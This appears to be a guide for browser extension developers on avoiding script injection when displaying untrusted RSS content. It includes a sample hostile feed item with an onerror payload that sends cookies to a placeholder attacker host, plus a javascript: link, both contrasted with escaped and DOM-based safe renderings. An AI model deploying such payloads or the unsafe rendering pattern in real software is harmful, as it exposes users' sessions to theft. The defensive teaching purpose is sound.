There are times when you might want or need to include content from an external source in your extension. But there is the risk that the source may have malicious scripts embedded in it, added either by the developer of the source or by a malicious third party.

Take an RSS reader as an example. You don't know what RSS feeds your extension will open and have no control over the content of those RSS feeds. So it's possible the user could subscribe to a feed where, for example, a feed item's title includes a script. This could be something as simple as including JavaScript code within <script></script> tags. If you were to extract the title, assume it was plain text, and add it to the DOM of a page created by your extension, your user now has an unknown script running in their browser. Therefore, care needs to be taken to avoid evaluating arbitrary text as HTML.

You also need to remember that extensions have privileged contexts, for example in background scripts and content scripts. In the worst case, an embedded script could run in one of these contexts, a situation known as privilege escalation.
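The RSS case above, as an added example that is not code from the original page or from any particular extension: a constructed hostile feed item, the unsafe rendering that treats its title as HTML, and two safe renderings, one that escapes every untrusted value before it meets markup and one that builds DOM nodes and sets textContent so the title is never parsed as HTML at all. The link check (safeHref) goes beyond the text, which only mentions titles, because a feed item's link is the other obvious place to smuggle script (a javascript: URL). The item contents, the function names and the attacker hostname are all assumptions made for the example.

```javascript
// Added example, not from the original page. The feed item below is constructed
// to look like a hostile RSS entry: script in the title (via an onerror handler,
// which fires even where <script> injected by innerHTML would not) and a
// javascript: URL in the link. attacker.example is a placeholder hostname.
const hostileItem = {
  title: 'Daily digest <img src=x onerror="fetch(\'https://attacker.example/?c=\' + document.cookie)">',
  link: 'javascript:alert(document.domain)',
};

// UNSAFE: title and link are interpolated straight into markup, so feed text is
// treated as HTML. Assigning the result to element.innerHTML runs the onerror
// handler, and the javascript: link fires when clicked.
function renderItemUnsafe(item) {
  return `<li><a href="${item.link}">${item.title}</a></li>`;
}

// Only http(s) links are allowed through; javascript:, data:, vbscript: and
// unparsable values are replaced with a harmless placeholder.
function safeHref(url) {
  try {
    const u = new URL(String(url));
    if (u.protocol === 'http:' || u.protocol === 'https:') return u.href;
  } catch (_) {
    // not a parsable URL: fall through to the placeholder
  }
  return 'about:blank';
}

// Escape the characters that change parsing in HTML text or attribute context.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// SAFE (string form): every untrusted value is escaped before it meets markup,
// and the link is restricted to http(s).
function renderItemSafe(item) {
  return `<li><a href="${escapeHtml(safeHref(item.link))}">${escapeHtml(item.title)}</a></li>`;
}

// SAFE (DOM form), the approach to prefer in an extension page: create the
// nodes and set textContent, so the title becomes a text node and "<img ...>"
// is displayed literally rather than parsed. `doc` is the page's document,
// passed in so the function can also be exercised outside a browser.
function appendItemSafe(doc, listEl, item) {
  const li = doc.createElement('li');
  const a = doc.createElement('a');
  a.href = safeHref(item.link);
  a.textContent = item.title;
  li.appendChild(a);
  listEl.appendChild(li);
  return li;
}

// Usage in an extension page:
//   appendItemSafe(document, document.getElementById('feed'), item);
```

The DOM form is the one to reach for in extension pages: there is nothing to escape because no string is ever parsed as HTML. The string form is there for code paths that genuinely have to produce markup, and it only stays safe as long as every interpolated value goes through escapeHtml and every URL through safeHref.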